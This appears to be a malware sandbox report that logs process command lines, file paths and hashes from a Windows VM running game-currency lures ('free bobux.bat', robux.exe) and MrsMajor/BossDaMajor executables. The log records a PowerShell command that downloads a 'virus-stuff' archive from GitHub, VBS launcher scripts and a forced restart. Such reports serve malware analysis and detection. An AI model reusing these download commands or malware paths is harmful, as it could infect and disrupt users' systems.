"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcd73946f8,0x7ffcd7394708,0x7ffcd7394718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6112 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5728 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5508 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free bobux.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6500 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FCFF.tmp\FD00.tmp\FD01.bat C:\Users\Admin\Downloads\robux.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FD2E.tmp\FD2F.tmp\FD30.bat C:\Users\Admin\Downloads\robux.exe"
C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\10D5.tmp\10D6.tmp\10D7.bat C:\Users\Admin\Downloads\robux.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x518 0x2ec
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6912 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4188 /prefetch:8
C:\Users\Admin\Downloads\MrsMajor3.0.exe
"C:\Users\Admin\Downloads\MrsMajor3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\A4EE.tmp\A4EF.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\eulascr.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6544 /prefetch:8
C:\Users\Admin\Downloads\BossDaMajor.exe
"C:\Users\Admin\Downloads\BossDaMajor.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\10D6.tmp\10D7.vbs
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" "C:\Program files\mrsmajor\mrsmajorlauncher.vbs" RunAsAdministrator
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "C:\Program Files\mrsmajor\def_resource\f11.mp4"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
C:\Windows\System32\shutdown.exe
"C:\Windows\System32\shutdown.exe" -r -t 03
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38f8055 /state1:0x41c64e6d
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
Network
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 38f59a47b777f2fc52088e96ffb2baaf |
| SHA1 | 267224482588b41a96d813f6d9e9d924867062db |
| SHA256 | 13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b |
| SHA512 | 4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b |
\??\pipe\LOCAL\crashpad_2788_OKINJYMZGPUGNRTJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ab8ce148cb7d44f709fb1c460d03e1b0 |
| SHA1 | 44d15744015155f3e74580c93317e12d2cc0f859 |
| SHA256 | 014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff |
| SHA512 | f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bd78858a8f82db8765484f24bb9a0da3 |
| SHA1 | 938a3de5fbc571f78fec57a0dede6a40efc2816e |
| SHA256 | 4c0b855e97328e9260804d81b255d987511630a138eb89b464adf84b757fd8c9 |
| SHA512 | 015de88d480dd9a0e61d9a89d794b0f860e9adf51f3a90844279c6d8554a390449e515c4ad5fd758db701df564175df920bfbeb716d1a66e69bbbd67859ec342 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13369538755321311
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011
